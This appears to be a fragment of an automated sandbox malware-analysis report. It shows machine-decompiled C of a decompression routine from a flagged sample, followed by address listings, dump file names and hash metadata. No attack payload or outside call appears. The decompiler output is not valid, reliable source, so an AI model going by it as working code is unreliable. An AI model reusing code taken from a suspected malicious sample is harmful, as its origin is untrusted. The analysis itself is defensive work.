											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x432610
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x432e10
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406d85
0x00406d85
0x00406d85
0x00406d85
0x00406d85
0x00406d89
0x00000000
0x00000000
0x00406d8f
0x00406d8f
0x00406d92
0x00406d95
0x00406d9a
0x00406d9c
0x00406d9f
0x00406da2
0x00406da5
0x00406da5
0x00406da8
0x00000000
0x00000000
0x00406daa
0x00406daa
0x00406dad
0x00406db2
0x00406db4
0x00406db7
0x00406dbd
0x00406b1c
0x00406b1c
0x00406b1f
0x00406b25
0x00406b2b
0x00406b34
0x00406b3a
0x00406b3d
0x00406b44
0x00406b49
0x00406b4f
0x00406b5a
0x00406b5a
0x00406dc3
0x00406dc3
0x00406dcd
0x00000000
0x00000000
0x00406dd3
0x00406dd3
0x00406dd7
0x00406dda
0x00406dda
0x00406dde
0x00406de4
0x00406de4
0x00406de7
0x00406dea
0x00406df0
0x00000000
0x00000000
0x00406df2
0x00406e14
0x00406e14
0x00406e17
0x00000000
0x00000000
0x00406df4
0x00406df8
0x00000000
0x00000000
0x00406dfe
0x00406dfe
0x00406e01
0x00406e04
0x00406e09
0x00406e0b
0x00406e0e
0x00406e11
0x00406e11
0x00406e19
0x00406e19
0x00406e1f
0x00406e22
0x00406e25
0x00406e25
0x00406e2c
0x00406e30
0x00406e34
0x00406e37
0x00406e3a
0x00406e40
0x00406e45
0x00000000
0x00000000
0x00406e47
0x00406e5b
0x00406e5b
0x00406e5f
0x00000000
0x00000000
0x00406e49
0x00406e4c
0x00406e4c
0x00406e53
0x00406e58
0x00406e58
0x00406e58
0x00406e61
0x00406e61
0x00406e64
0x00406e72
0x00406e78
0x00406e7d
0x00406e83
0x00406e89
0x00406e8f
0x00406e96
0x00406eaa
0x00406eaa
0x00407479
0x00407479
0x00407479
0x0040747e
0x00000000
0x00000000
0x00406ab6
0x00406ab6
0x00000000
0x004070b1
0x004070b1
0x004070b5
0x004070b8
0x004070bb
0x004070be
0x00000000
0x00000000
0x004070c4
0x004070c4
0x004070e9
0x004070e9
0x004070e9
0x004070eb
0x00000000
0x00000000
0x004070c9
0x004070c9
0x004070cd
0x00000000
0x00000000
0x004070d3
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070de
0x004070e0
0x004070e3
0x004070e6
0x004070e6
0x004070e6
0x004070ed
0x004070ed
0x004070f5
0x004070f8
0x004070fb
0x004070fe
0x00407102
0x00407105
0x00407107
0x0040710a
0x0040710c
0x00407120
0x00407120
0x00407123
0x0040713d
0x0040713d
0x00407140
0x00000000
0x00000000
0x00407146
0x00407146
0x00407149
0x00000000
0x00000000
0x0040714f
0x0040714f
0x00000000
0x0040714f
0x00407125
0x00407128
0x0040712f
0x00407132
0x00000000
0x00407132
0x0040710e
0x00407112
0x00407115
0x00000000
0x00000000
0x0040715a
0x0040715a
0x0040717f
0x0040717f
0x0040717f
0x00407181
0x00000000
0x00000000
0x0040715f
0x0040715f
0x00407163
0x00000000
0x00000000
0x00407169
0x00407169
0x0040716c
0x0040716f
0x00407172
0x00407174
0x00407176
0x00407179
0x0040717c
0x0040717c
0x0040717c
0x00407183
0x0040718b
0x0040718e
0x00407191
0x00407193
0x00407196
0x00407196
0x00407198
0x0040719c
0x0040719f
0x004071a2
0x004071a5
0x00000000
0x00000000
0x004071ab
0x004071ab
0x004071d0
0x004071d0
0x004071d0
0x004071d2
0x00000000
0x00000000
0x004071b0
0x004071b0
0x004071b4
0x00000000
0x00000000
0x004071ba
0x004071ba
0x004071bd
0x004071c0
0x004071c3
0x004071c5
0x004071c7
0x004071ca
0x004071cd
0x004071cd
0x004071cd
0x004071d4
0x004071d4
0x004071dc
0x004071df
0x004071e2
0x004071e5
0x004071e9
0x004071ec
0x004071ee
0x004071f1
0x004071f4
0x0040720e
0x0040720e
0x00407211
0x00000000
0x00000000
0x00407217
0x00407217
0x0040721a
0x00407221
0x00000000
0x00407221
0x004071f6
0x004071f9
0x00407200
0x00407203
0x00000000
0x00000000
0x00407229
0x00407229
0x0040724e
0x0040724e
0x0040724e
0x00407250
0x00000000
0x00000000
0x0040722e
0x0040722e
0x00407232
0x00000000
0x00000000
0x00407238
0x00407238
0x0040723b
0x0040723e
0x00407241
0x00407243
0x00407245
0x00407248
0x0040724b
0x0040724b
0x0040724b
0x00407252
0x0040725a
0x0040725d
0x00407260
0x00407262
0x00407265
0x00407265
0x00407267
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407270
0x00407275
0x00407277
0x0040727d
0x0040727f
0x00407294
0x00407296
0x00407296
0x00407281
0x00407287
0x00407289
0x0040728b
0x0040728b
0x00407298
0x0040729c
0x0040729f
0x004072a5
0x004072a5
0x004072a8
0x004072a8
0x004072a8
0x004072aa
0x00000000
0x00000000
0x004072b0
0x004072b0
0x004072b6
0x004072b8
0x004072dd
0x004072e0
0x004072e6
0x004072eb
0x004072f1
0x004072f7
0x004072f9
0x004072fc
0x00407305
0x0040730b
0x0040730b
0x004072fe
0x00407300
0x00407302
0x00407302
0x0040730d
0x00407313
0x00407315
0x00407318
0x0040731a
0x00407320
0x00407322
0x00407324
0x00407326
0x00407328
0x0040732b
0x00407334
0x00407337
0x00407337
0x0040732d
0x0040732d
0x00407330
0x00407330
0x0040732b
0x00407322
0x00407339
0x0040733b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040733b
0x004072ba
0x004072ba
0x004072c0
0x004072c6
0x004072c8
0x00000000
0x00000000
0x004072ca
0x004072ca
0x004072cc
0x004072ce
0x004072d7
0x004072d7
0x004072d0
0x004072d0
0x004072d3
0x004072d3
0x004072d9
0x004072db
0x00000000
0x00000000
0x00407341
0x00407341
0x00407346
0x00407348
0x00407349
0x0040734a
0x0040734b
0x00407351
0x00407354
0x00407357
0x0040735a
0x0040735c
0x00407362
0x00407362
0x00407365
0x00407365
0x00407365
0x00407365
0x0040736e
0x00000000
0x00000000
0x00407373
0x00407373
0x00407376
0x00407379
0x0040737b
0x00407412
0x00407412
0x00407415
0x00407417
0x00407418
0x00407419
0x0040741c
0x00000000
0x0040741c
0x00407381
0x00407381
0x00407387
0x00407389
0x004073ae
0x004073b1
0x004073b7
0x004073bc
0x004073c2
0x004073c8
0x004073ca
0x004073cd
0x004073d6
0x004073dc
0x004073dc
0x004073cf
0x004073d1
0x004073d3
0x004073d3
0x004073de
0x004073e4
0x004073e6
0x004073e9
0x004073eb
0x004073f1
0x004073f3
0x004073f5
0x004073f7
0x004073f9
0x004073fc
0x00407405
0x00407408
0x00407408
0x004073fe
0x004073fe
0x00407401
0x00407401
0x004073fc
0x004073f3
0x0040740a
0x0040740c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040740c
0x0040738b
0x0040738b
0x00407391
0x00407397
0x00407399
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739d
0x0040739f
0x004073a6
0x004073a6
0x004073a8
0x004073a1
0x004073a1
0x004073a3
0x004073a3
0x004073aa
0x004073ac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407424
0x00407424
0x00407427
0x00407429
0x0040742c
0x0040742f
0x0040742f
0x0040742f
0x0040742f
0x00000000
0x00000000
0x00000000
0x00406add
0x00406ac1
0x00000000
0x00406ac7
0x00406aca
0x00406ad4
0x00406ad7
0x00406ada
0x00000000
0x00406ada
0x00406ac1
0x00406ae5
0x00406ae8
0x00406aec
0x00406af6
0x00406b00
0x00406b03
0x00406b09
0x00406c3d
0x00406c3f
0x00406c45
0x00406c48
0x00406c4b
0x00000000
0x00406c4b
0x00406b0f
0x00406b0f
0x00406b10
0x00406b68
0x00406b68
0x00406b6f
0x00406c15
0x00406c15
0x00406c1a
0x00406c1d
0x00406c22
0x00406c25
0x00406c2a
0x00406c2d
0x00406c32
0x00406c35
0x00406c35
0x00000000
0x00406b75
0x00406b75
0x00406b75
0x00406b75
0x00406b79
0x00406b79
0x00406b9b
0x00406b9e
0x00406ba0
0x00406ba3
0x00406ba8
0x00406b7e
0x00406b7e
0x00406b83
0x00406b85
0x00406b87
0x00406b8c
0x00406b92
0x00406b97
0x00406b99
0x00406b99
0x00406b8e
0x00406b8e
0x00406b8e
0x00406b8c
0x00000000
0x00406baa
0x00406bd7
0x00406bdc
0x00406bde
0x00406bdf
0x00406be1
0x00406be2
0x00406be2
0x00406be2
0x00406c0a
0x00406c0f
0x00406c0f
0x00000000
0x00406c0f
0x00406ba8
0x00406b6f
0x00406b12
0x00406b12
0x00406b13
0x00406b5d
0x00000000
0x00406b5d
0x00406b15
0x00406b16
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c72
0x00406c72
0x00406c72
0x00406c75
0x00000000
0x00000000
0x00406c52
0x00406c52
0x00406c56
0x00000000
0x00000000
0x00406c5c
0x00406c5c
0x00406c5f
0x00406c62
0x00406c67
0x00406c69
0x00406c6c
0x00406c6f
0x00406c6f
0x00406c6f
0x00406c77
0x00406c77
0x00406c7a
0x00406c7c
0x00406c81
0x00406c84
0x00406c86
0x00406c89
0x00000000
0x00000000
0x00406c8f
0x00406c8f
0x00406c91
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00000000
0x00000000
0x00406ca1
0x00406ca1
0x00406ca4
0x00406ca6
0x00406d44
0x00406d44
0x00406d47
0x00406d49
0x00406d49
0x00406d4c
0x00406d4f
0x00406d51
0x00406d53
0x00406d55
0x00406d55
0x00406d5e
0x00406d63
0x00406d66
0x00406d69
0x00406d6c
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d78
0x00406d78
0x00406d7e
0x00406d7e
0x00406d7e
0x00000000
0x00406d72
0x00406cac
0x00406cac
0x00406cb2
0x00406cb5
0x00406cb7
0x00406ce2
0x00406ce5
0x00406ceb
0x00406cf0
0x00406cf6
0x00406cfc
0x00406cfe
0x00406d01
0x00406d0a
0x00406d10
0x00406d10
0x00406d03
0x00406d05
0x00406d07
0x00406d07
0x00406d12
0x00406d18
0x00406d1b
0x00406d1d
0x00406d1f
0x00406d25
0x00406d27
0x00406d29
0x00406d2c
0x00406d35
0x00406d35
0x00406d37
0x00406d2e
0x00406d2e
0x00406d31
0x00406d31
0x00406d39
0x00406d39
0x00406d27
0x00406d3c
0x00406d3e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d3e
0x00406cb9
0x00406cb9
0x00406cbf
0x00406cc5
0x00406cc7
0x00000000
0x00000000
0x00406cc9
0x00406cc9
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd7
0x00406cd7
0x00406cd9
0x00406cd2
0x00406cd2
0x00406cd4
0x00406cd4
0x00406cdb
0x00406cdd
0x00406ce0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de4
0x00406de7
0x00406dea
0x00406df0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc7
0x00406fc7
0x00406fc7
0x00406fca
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd8
0x00406fdf
0x00406fe1
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406edd
0x00406edd
0x00406edd
0x00406edf
0x00000000
0x00000000
0x00406ebd
0x00406ebd
0x00406ec1
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406eca
0x00406ecd
0x00406ed0
0x00406ed2
0x00406ed4
0x00406ed7
0x00406eda
0x00406eda
0x00406eda
0x00406ee1
0x00406ee1
0x00406ee9
0x00406eec
0x00406ef2
0x00406ef5
0x00406ef9
0x00406efd
0x00406f00
0x00406f03
0x00406f1b
0x00406f1b
0x00406f1e
0x00406f2c
0x00406f2f
0x00406f20
0x00406f20
0x00406f22
0x00406f29
0x00406f29
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5d
0x00000000
0x00000000
0x00406f38
0x00406f38
0x00406f3c
0x00000000
0x00000000
0x00406f42
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4d
0x00406f4f
0x00406f52
0x00406f55
0x00406f55
0x00406f55
0x00406f5f
0x00406f5f
0x00406f61
0x00406f63
0x00406f6e
0x00406f71
0x00406f74
0x00406f76
0x00406f78
0x00406f7a
0x00406f7d
0x00406f80
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f95
0x00406f98
0x00406f9a
0x00000000
0x00000000
0x00406fa0
0x00406fa0
0x00406fa4
0x00406fb5
0x00406fb5
0x00406fb5
0x00406fb7
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fbb
0x00406fbd
0x00406fbe
0x00406fc1
0x00406fc1
0x00406fc1
0x00406fc4
0x00000000
0x00406fc4
0x00406fa6
0x00406fa6
0x00406fa9
0x00000000
0x00000000
0x00406faf
0x00406faf
0x00000000
0x00406faf
0x00406f05
0x00406f05
0x00406f07
0x00406f09
0x00406f0c
0x00406f0f
0x00406f13
0x00406f13
0x00406fe7
0x00406fe7
0x00406fea
0x00406ff1
0x00406ff5
0x00406ff7
0x00406ffa
0x00406ffd
0x00407002
0x00407005
0x00407007
0x00407008
0x0040700b
0x00407016
0x00407019
0x00407030
0x00407035
0x0040703c
0x00407041
0x00407045
0x00407047
0x00407047
0x00407047
0x0040704a
0x0040704c
0x00000000
0x00407052
0x00407052
0x00407056
0x00407061
0x00407074
0x00407079
0x0040707e
0x00407080
0x00000000
0x00000000
0x00407086
0x00407086
0x00407089
0x0040708b
0x00407099
0x00407099
0x0040709c
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x00000000
0x004070ae
0x0040708d
0x0040708d
0x00407093
0x00000000
0x00000000
0x00000000
0x00407093
0x00000000
0x00000000
0x00000000
0x00407432
0x00407432
0x00407438
0x0040743e
0x00407443
0x00407449
0x0040744f
0x00407451
0x00407454
0x0040745d
0x00407463
0x00407463
0x00407456
0x00407458
0x0040745a
0x0040745a
0x00407465
0x00407467
0x0040746a
0x004074a5
0x004074a5
0x00000000
0x0040746c
0x0040746c
0x0040746c
0x00407472
0x00407475
0x00407477
0x004074ac
0x004074ae
0x00000000
0x004074ae
0x00000000
0x00407477
0x00000000
0x00406ab6
0x00407484
0x00000000
0x00407484
0x00406e98
0x00406e9a
0x00000000
0x00000000
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00406e9f
0x00406de4
0x00406da5
0x00407489
0x0040748c
0x0040748e
0x00407497
0x0040749d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040755C Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
